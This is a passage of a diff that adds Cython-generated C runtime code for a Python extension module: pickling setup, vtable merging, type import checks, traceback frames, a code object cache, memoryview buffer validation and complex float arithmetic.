(!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* SetVTable */ + static int __Pyx_SetVtable(PyTypeObject *type, void *vtable) { + PyObject *ob = PyCapsule_New(vtable, 0, 0); + if (unlikely(!ob)) + goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(PyObject_SetAttr((PyObject *) type, __pyx_n_s_pyx_vtable, ob) < 0)) +#else + if (unlikely(PyDict_SetItem(type->tp_dict, __pyx_n_s_pyx_vtable, ob) < 0)) +#endif + goto bad; + Py_DECREF(ob); + return 0; +bad: + Py_XDECREF(ob); + return -1; +} + +/* GetVTable */ + static void* __Pyx_GetVtable(PyTypeObject *type) { + void* ptr; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *ob = PyObject_GetAttr((PyObject *)type, __pyx_n_s_pyx_vtable); +#else + PyObject *ob = PyObject_GetItem(type->tp_dict, __pyx_n_s_pyx_vtable); +#endif + if (!ob) + goto bad; + ptr = PyCapsule_GetPointer(ob, 0); + if (!ptr && !PyErr_Occurred()) + PyErr_SetString(PyExc_RuntimeError, "invalid vtable found for imported type"); + Py_DECREF(ob); + return ptr; +bad: + Py_XDECREF(ob); + return NULL; +} + +/* MergeVTables */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type) { + int i; + void** base_vtables; + __Pyx_TypeName tp_base_name; + __Pyx_TypeName base_name; + void* unknown = (void*)-1; + PyObject* bases = type->tp_bases; + int base_depth = 0; + { + PyTypeObject* base = type->tp_base; + while (base) { + base_depth += 1; + base = base->tp_base; + } + } + base_vtables = (void**) malloc(sizeof(void*) * (size_t)(base_depth + 1)); + base_vtables[0] = unknown; + for (i = 1; i < PyTuple_GET_SIZE(bases); i++) { + void* base_vtable = __Pyx_GetVtable(((PyTypeObject*)PyTuple_GET_ITEM(bases, i))); + if (base_vtable != NULL) { + int j; + PyTypeObject* base = type->tp_base; + for (j = 0; j < base_depth; j++) { + if (base_vtables[j] == unknown) { + base_vtables[j] = __Pyx_GetVtable(base); + base_vtables[j + 1] = unknown; + } + if (base_vtables[j] == base_vtable) { + break; + } else if (base_vtables[j] == NULL) { + goto bad; + } + base = base->tp_base; + } + } + } + PyErr_Clear(); + free(base_vtables); + return 0; +bad: + tp_base_name = __Pyx_PyType_GetName(type->tp_base); + base_name = __Pyx_PyType_GetName((PyTypeObject*)PyTuple_GET_ITEM(bases, i)); + PyErr_Format(PyExc_TypeError, + "multiple bases have vtable conflict: '" __Pyx_FMT_TYPENAME "' and '" __Pyx_FMT_TYPENAME "'", tp_base_name, base_name); + __Pyx_DECREF_TypeName(tp_base_name); + __Pyx_DECREF_TypeName(base_name); + free(base_vtables); + return -1; +} +#endif + +/* TypeImport */ + #ifndef __PYX_HAVE_RT_ImportType_3_0_0 +#define __PYX_HAVE_RT_ImportType_3_0_0 +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject *module, const char *module_name, const char *class_name, + size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size) +{ + PyObject *result = 0; + char warning[200]; + Py_ssize_t basicsize; + Py_ssize_t itemsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + PyObject *py_itemsize; +#endif + result = PyObject_GetAttrString(module, class_name); + if (!result) + goto bad; + if (!PyType_Check(result)) { + PyErr_Format(PyExc_TypeError, + "%.200s.%.200s is not a type object", + module_name, class_name); + goto bad; + } +#if !CYTHON_COMPILING_IN_LIMITED_API + basicsize = ((PyTypeObject *)result)->tp_basicsize; + itemsize = ((PyTypeObject *)result)->tp_itemsize; +#else + py_basicsize = PyObject_GetAttrString(result, "__basicsize__"); + if (!py_basicsize) + goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (basicsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; + py_itemsize = PyObject_GetAttrString(result, "__itemsize__"); + if (!py_itemsize) + goto bad; + itemsize = PyLong_AsSsize_t(py_itemsize); + Py_DECREF(py_itemsize); + py_itemsize = 0; + if (itemsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; +#endif + if (itemsize) { + if (size % alignment) { + alignment = size % alignment; + } + if (itemsize < (Py_ssize_t)alignment) + itemsize = (Py_ssize_t)alignment; + } + if ((size_t)(basicsize + itemsize) < size) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize+itemsize); + goto bad; + } + if (check_size == __Pyx_ImportType_CheckSize_Error_3_0_0 && + ((size_t)basicsize > size || (size_t)(basicsize + itemsize) < size)) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd-%zd from PyObject", + module_name, class_name, size, basicsize, basicsize+itemsize); + goto bad; + } + else if (check_size == __Pyx_ImportType_CheckSize_Warn_3_0_0 && (size_t)basicsize > size) { + PyOS_snprintf(warning, sizeof(warning), + "%s.%s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize); + if (PyErr_WarnEx(NULL, warning, 0) < 0) goto bad; + } + return (PyTypeObject *)result; +bad: + Py_XDECREF(result); + return NULL; +} +#endif + +/* CLineInTraceback */ + #ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ + #include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +#if PY_MAJOR_VERSION < 3 +static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags) { + __Pyx_TypeName obj_type_name; + if (PyObject_CheckBuffer(obj)) return PyObject_GetBuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_array_type)) return __pyx_array_getbuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_memoryview_type)) return __pyx_memoryview_getbuffer(obj, view, flags); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' does not have the buffer interface", + obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return -1; +} +static void __Pyx_ReleaseBuffer(Py_buffer *view) { + PyObject *obj = view->obj; + if (!obj) return; + if (PyObject_CheckBuffer(obj)) { + PyBuffer_Release(view); + return; + } + if ((0)) {} + view->obj = NULL; + Py_DECREF(obj); +} +#endif + + + /* MemviewSliceIsContig */ + static int +__pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim) +{ + int i, index, step, start; + Py_ssize_t itemsize = mvs.memview->view.itemsize; + if (order == 'F') { + step = 1; + start = 0; + } else { + step = -1; + start = ndim - 1; + } + for (i = 0; i < ndim; i++) { + index = start + step * i; + if (mvs.suboffsets[index] >= 0 || mvs.strides[index] != itemsize) + return 0; + itemsize *= mvs.shape[index]; + } + return 1; +} + +/* OverlappingSlices */ + static void +__pyx_get_array_memory_extents(__Pyx_memviewslice *slice, + void **out_start, void **out_end, + int ndim, size_t itemsize) +{ + char *start, *end; + int i; + start = end = slice->data; + for (i = 0; i < ndim; i++) { + Py_ssize_t stride = slice->strides[i]; + Py_ssize_t extent = slice->shape[i]; + if (extent == 0) { + *out_start = *out_end = start; + return; + } else { + if (stride > 0) + end += stride * (extent - 1); + else + start += stride * (extent - 1); + } + } + *out_start = start; + *out_end = end + itemsize; +} +static int +__pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize) +{ + void *start1, *end1, *start2, *end2; + __pyx_get_array_memory_extents(slice1, &start1, &end1, ndim, itemsize); + __pyx_get_array_memory_extents(slice2, &start2, &end2, ndim, itemsize); + return (start1 < end2) && (start2 < end1); +} + +/* CIntFromPyVerify */ + #define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* TypeInfoCompare */ + static int +__pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b) +{ + int i; + if (!a || !b) + return 0; + if (a == b) + return 1; + if (a->size != b->size || a->typegroup != b->typegroup || + a->is_unsigned != b->is_unsigned || a->ndim != b->ndim) { + if (a->typegroup == 'H' || b->typegroup == 'H') { + return a->size == b->size; + } else { + return 0; + } + } + if (a->ndim) { + for (i = 0; i < a->ndim; i++) + if (a->arraysize[i] != b->arraysize[i]) + return 0; + } + if (a->typegroup == 'S') { + if (a->flags != b->flags) + return 0; + if (a->fields || b->fields) { + if (!(a->fields && b->fields)) + return 0; + for (i = 0; a->fields[i].type && b->fields[i].type; i++) { + __Pyx_StructField *field_a = a->fields + i; + __Pyx_StructField *field_b = b->fields + i; + if (field_a->offset != field_b->offset || + !__pyx_typeinfo_cmp(field_a->type, field_b->type)) + return 0; + } + return !a->fields[i].type && !b->fields[i].type; + } + } + return 1; +} + +/* MemviewSliceValidateAndInit */ + static int +__pyx_check_strides(Py_buffer *buf, int dim, int ndim, int spec) +{ + if (buf->shape[dim] <= 1) + return 1; + if (buf->strides) { + if (spec & __Pyx_MEMVIEW_CONTIG) { + if (spec & (__Pyx_MEMVIEW_PTR|__Pyx_MEMVIEW_FULL)) { + if (unlikely(buf->strides[dim] != sizeof(void *))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly contiguous " + "in dimension %d.", dim); + goto fail; + } + } else if (unlikely(buf->strides[dim] != buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_FOLLOW) { + Py_ssize_t stride = buf->strides[dim]; + if (stride < 0) + stride = -stride; + if (unlikely(stride < buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + } else { + if (unlikely(spec & __Pyx_MEMVIEW_CONTIG && dim != ndim - 1)) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not contiguous in " + "dimension %d", dim); + goto fail; + } else if (unlikely(spec & (__Pyx_MEMVIEW_PTR))) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not indirect in " + "dimension %d", dim); + goto fail; + } else if (unlikely(buf->suboffsets)) { + PyErr_SetString(PyExc_ValueError, + "Buffer exposes suboffsets but no strides"); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_check_suboffsets(Py_buffer *buf, int dim, int ndim, int spec) +{ + CYTHON_UNUSED_VAR(ndim); + if (spec & __Pyx_MEMVIEW_DIRECT) { + if (unlikely(buf->suboffsets && buf->suboffsets[dim] >= 0)) { + PyErr_Format(PyExc_ValueError, + "Buffer not compatible with direct access " + "in dimension %d.", dim); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_PTR) { + if (unlikely(!buf->suboffsets || (buf->suboffsets[dim] < 0))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly accessible " + "in dimension %d.", dim); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_verify_contig(Py_buffer *buf, int ndim, int c_or_f_flag) +{ + int i; + if (c_or_f_flag & __Pyx_IS_F_CONTIG) { + Py_ssize_t stride = 1; + for (i = 0; i < ndim; i++) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not fortran contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } else if (c_or_f_flag & __Pyx_IS_C_CONTIG) { + Py_ssize_t stride = 1; + for (i = ndim - 1; i >- 1; i--) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not C contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } + return 1; +fail: + return 0; +} +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj) +{ + struct __pyx_memoryview_obj *memview, *new_memview; + __Pyx_RefNannyDeclarations + Py_buffer *buf; + int i, spec = 0, retval = -1; + __Pyx_BufFmt_Context ctx; + int from_memoryview = __pyx_memoryview_check(original_obj); + __Pyx_RefNannySetupContext("ValidateAndInit_memviewslice", 0); + if (from_memoryview && __pyx_typeinfo_cmp(dtype, ((struct __pyx_memoryview_obj *) + original_obj)->typeinfo)) { + memview = (struct __pyx_memoryview_obj *) original_obj; + new_memview = NULL; + } else { + memview = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + original_obj, buf_flags, 0, dtype); + new_memview = memview; + if (unlikely(!memview)) + goto fail; + } + buf = &memview->view; + if (unlikely(buf->ndim != ndim)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + ndim, buf->ndim); + goto fail; + } + if (new_memview) { + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (unlikely(!__Pyx_BufFmt_CheckString(&ctx, buf->format))) goto fail; + } + if (unlikely((unsigned) buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "u byte%s) " + "does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "u byte%s)", + buf->itemsize, + (buf->itemsize > 1) ? "s" : "", + dtype->name, + dtype->size, + (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->len > 0) { + for (i = 0; i < ndim; i++) { + spec = axes_specs[i]; + if (unlikely(!__pyx_check_strides(buf, i, ndim, spec))) + goto fail; + if (unlikely(!__pyx_check_suboffsets(buf, i, ndim, spec))) + goto fail; + } + if (unlikely(buf->strides && !__pyx_verify_contig(buf, ndim, c_or_f_flag))) + goto fail; + } + if (unlikely(__Pyx_init_memviewslice(memview, ndim, memviewslice, + new_memview != NULL) == -1)) { + goto fail; + } + retval = 0; + goto no_fail; +fail: + Py_XDECREF(new_memview); + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} + +/* ObjectToMemviewSlice */ + static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dcd__double(PyObject *obj, int writable_flag) { + __Pyx_memviewslice result = { 0, 0, { 0 }, { 0 }, { 0 } }; + __Pyx_BufFmt_StackElem stack[1]; + int axes_specs[] = { (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_CONTIG), (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_FOLLOW) }; + int retcode; + if (obj == Py_None) { + result.memview = (struct __pyx_memoryview_obj *) Py_None; + return result; + } + retcode = __Pyx_ValidateAndInit_memviewslice(axes_specs, __Pyx_IS_F_CONTIG, + (PyBUF_F_CONTIGUOUS | PyBUF_FORMAT) | writable_flag, 2, + &__Pyx_TypeInfo_double, stack, + &result, obj); + if (unlikely(retcode == -1)) + goto __pyx_fail; + return result; +__pyx_fail: + result.memview = NULL; + result.data = NULL; + return result; +} + +/* ObjectToMemviewSlice */ + static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dc_unsigned_char(PyObject *obj, int writable_flag) { + __Pyx_memviewslice result = { 0, 0, { 0 }, { 0 }, { 0 } }; + __Pyx_BufFmt_StackElem stack[1]; + int axes_specs[] = { (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_CONTIG) }; + int retcode; + if (obj == Py_None) { + result.memview = (struct __pyx_memoryview_obj *) Py_None; + return result; + } + retcode = __Pyx_ValidateAndInit_memviewslice(axes_specs, __Pyx_IS_C_CONTIG, + (PyBUF_C_CONTIGUOUS | PyBUF_FORMAT) | writable_flag, 1, + &__Pyx_TypeInfo_unsigned_char, stack, + &result, obj); + if (unlikely(retcode == -1)) + goto __pyx_fail; + return result; +__pyx_fail: + result.memview = NULL; + result.data = NULL; + return result; +} + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return ::std::complex< float >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return x + y*(__pyx_t_float_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + __pyx_t_float_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabsf(b.real) >= fabsf(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + float r = b.imag / b.real; + float s = (float)(1.0) / (b.real + b.imag * r); + return __pyx_t_float_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + float r = b.real / b.imag; + float s = (float)(1.0) / (b.imag + b.real * r); + return __pyx_t_float_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + float denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_float_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrtf(z.real*z.real + z.imag*z.imag); + #else + return hypotf(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + float r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + float denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_float(a, a); + case 3: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, a); + case 4: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = powf(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2f(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_float(a); + theta = atan2f(a.imag, a.real); + } + lnr = logf(r); + z_r = expf(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cosf(z_theta); + z.imag = z_r * sinf(z_theta); + return z; + } + #endif +#endif + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE 